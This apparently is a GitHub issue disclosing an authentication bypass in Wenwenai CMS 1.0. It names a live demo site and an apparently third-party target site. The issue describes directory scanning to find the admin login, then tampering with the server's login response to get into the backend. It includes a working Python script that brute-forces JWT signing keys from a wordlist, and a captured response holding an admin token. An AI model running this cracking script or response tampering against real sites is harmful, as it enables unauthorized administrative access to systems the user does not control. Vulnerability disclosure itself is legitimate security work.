Skip to content

WenwenAiCms Vulnerability Testing #2

Open
@PwnCYN

Description

@PwnCYN

Product Name:
Wenwenai CMS

Affect version:
1.0

Case Address:
Demo:https://chat.wenwen-ai.com/
Target:https://laoluoai.com/

Vulnerability Type:
Logical Fallacies

Description:

Discover the backend login address through directory scanning, obtain the developer's demo site address on the login interface, log in and capture packets based on the account password provided by the demo site, and record the response packet of the login data packet.
Demo
Based on the correct login return packet, the site can be found for JWT verification, and signature information can be guessed by blasting.

When logging in to the same source CMS login interface with an unknown account password, modify the login packet to the successful login packet information to achieve JWT verification and successfully log in to the backend.
Target
400 error is prompted when login information is not known. At this time, the returned data packet information can be modified to successful login data information to bypass login.

Blasting:

import jwt
import termcolor

if __name__ == "__main__":
    jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
    with open('topred.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                jwt.decode(jwt_str, verify=True, key=key_)
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError,
                    jwt.exceptions.ImmatureSignatureError):
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                continue
        else:
            print('\r', '\bsorry! no key be found!')

Poc:

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding

{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions